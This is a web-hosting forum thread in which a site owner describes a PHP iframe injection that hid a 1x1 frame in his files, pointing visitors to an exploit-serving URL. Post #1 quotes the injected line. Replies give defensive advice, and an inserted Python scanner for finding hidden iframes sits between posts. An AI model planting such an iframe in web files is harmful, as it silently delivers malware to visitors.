JaguarPC Community - Web Hosting, VPS Hosting, cPanel VPS Hosting, Hybrid Servers, Dedicated Servers, Virutal Private Servers, Managed Servers
:( Someone injected my php files with a virus
#1 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
Someone just injected my blog with an iframe hack that sent users to a Java executable with the Exploit-ByteVerify virus...
I'm running WordPress 2.5 and the latest plugins... Luckily I'm on a reseller account and have self-suspended that sub-account. Any advice or knowledge about how this could be prevented would help. I'll try to find out what the exploit was soon. Here's the PHP injected code. I'm not at a location where I can figure out who last accessed the account... DO NOT VISIT THIS SITE!
Code:
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
http://forum.coppermine-gallery.net/...c,51671.0.html
__________________
Mike
Last edited by thelucky4; 04-10-2008 at 02:06 PM. |
#2 |
|
Jag Veteran
Join Date: Sep 2001
Location: Albuquerque NM
Posts: 1,394
|
WordPress has a lot of security issues. Do you have register globals disabled on your server? That seems to be the most common way hackers gain access to these scripts.
Also make sure you are keeping your scripts constantly updated.
__________________
Pawel Kowalski Albuquerque Web Design templatesXchange - Free Web Templates - Native American Jewelry |
#3 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
From looking at the forums on the inter-tubes, it appears this was a remote injection exploit by an uploaded *.zip file to even the latest patched Coppermine 1.4.16
So through Coppermine, it infected all of my user-wide *.php files...urr I think this is the 2nd time similar events have happened since being online in 2004...
__________________
Mike |
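An added example, not part of any post in this thread: a small Python scanner for the cleanup situation described in the post above, listing which files under a web root carry a hidden off-site iframe like the one quoted in post #1. The sample strings, the `malicious.example` host and all function names are constructed for illustration.

```python
import os
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>'"]+))""", re.I)

# Constructed samples: an injected line shaped like the one in the post, and a visible embed.
INFECTED = ("<?php get_header(); ?>\n<?php echo '<iframe "
            "src=\"http://malicious.example/dl/x.php\" width=1 height=1></iframe>'; ?>\n")
CLEAN = '<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>\n'

def parse_attrs(tag):
    """Attributes of one tag as a dict; handles quoted and bare values."""
    tag = tag.replace('\\"', '"')  # undo PHP-escaped quotes inside echo "..."
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True if either dimension is <= 1px or CSS hides the frame."""
    def tiny(value):
        m = re.match(r"\s*(\d+)", value or "")
        return bool(m) and int(m.group(1)) <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)

def find_hidden_iframes(text, own_hosts=()):
    """Return (line_number, host) for each hidden iframe loading an off-site URL."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        host = urlparse(attrs.get("src", "")).hostname
        if host and host not in own_hosts and is_hidden(attrs):
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits

def scan_tree(root, own_hosts=()):
    """Map each .php/.htm/.html file under root to its hits; clean files are omitted."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".htm", ".html")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read(), own_hosts)
                if hits:
                    report[path] = hits
    return report
```

Pass the site's own hostnames as `own_hosts` so legitimate same-site frames are not reported; a hit only identifies files to restore from backup, it does not show how the files were written.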
#4 |
|
Jag Veteran
Join Date: Sep 2001
Location: Albuquerque NM
Posts: 1,394
|
I feel your pain, a phpBB board I host has been hacked 3 times. Since the latest patches and having register globals off it hasn't happened yet but I'm sure it will happen again in the future. Best thing you can do is have current back ups of everything.
__________________
Pawel Kowalski Albuquerque Web Design templatesXchange - Free Web Templates - Native American Jewelry |
#5 |
|
all about nothing!
|
Not so much WordPress as it is any gallery. Seems galleries with upload features are what hackers are always looking to exploit.
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
#6 |
|
Nearly 100% Pure Carbon
Join Date: Nov 2007
Location: Northeast Pennsylvania
Posts: 429
|
You need to keep things up to date, get on the mailing lists for any software you install. Also make sure you keep up on the updates for any hacks you use.
Other than that take whatever steps you can, for example I password protect admin folders with htaccess. This won't help for vulnerabilities in the public files but it will all but stop them dead for admin files. It's not 100% effective but nothing is.... point is they just move on to another server that is easier to attack. |
#7 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
Hackers suck.
Anyways, the good Jag team replaced the entire directory with a backup. Now things are fine. No more gallery from now on.
__________________
Mike |
#8 |
|
all about nothing!
|
Take a look at the nextgen plugin for WordPress...
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
#9 |
|
Carpe Diem
Join Date: Jan 2008
Posts: 89
|
Wow that looks awesome. Will have to integrate it to the blog.
Thanks Frank
__________________
Mike |
#10 |
|
all about nothing!
|
You are welcome....
I integrate this with it: http://www.laptoptips.ca/projects/wp-shutter-reloaded/
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
#11 | |
|
Yeah, I know a LOT!
Join Date: Mar 2003
Location: Arizona Uplands Intelligence Quotient: 138+
Posts: 10,384
|
Quote:
Thanks for the laugh!!! I'm running, like, Coppermine 1.1D... supposedly the most unsecure version ever made. I rewrote Coppermine and they offered me a position of their Dev Team, but I wasn't answering email at the time - only to have them get in my face later and threaten to sue me for hacking their code. Glad to hear they mucked it up... To date, my Coppermine rewrite was only hacked once, in 2003 I think - someone set themselves up as a mod. I plugged that, and haven't been hacked since, even though I allow anonymous uploads! Anyway, thanks for the chuckle... Um... What was your question?
__________________
DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient. |
#12 | |
|
/dev/null
Join Date: Apr 2008
Posts: 116
|
Quote:
http://www.jaguarpc.com/support/kbase/731.html |
#13 |
|
all about nothing!
|
Vin, you are just too great for us mere mortals. We bow to your superiority! 8-)
Too bad you do not use the gallery for anything.....
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |
#14 | |
|
Yeah, I know a LOT!
Join Date: Mar 2003
Location: Arizona Uplands Intelligence Quotient: 138+
Posts: 10,384
|
Quote:
VinDSL_Search.png It's sickening, no?
__________________
DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient. |
#15 |
|
all about nothing!
|
hahaha..... ya all about Vin......
__________________
Frank Broughton Frank Broughton Times - My adventures, scenic photography, opinion, tech tips & more |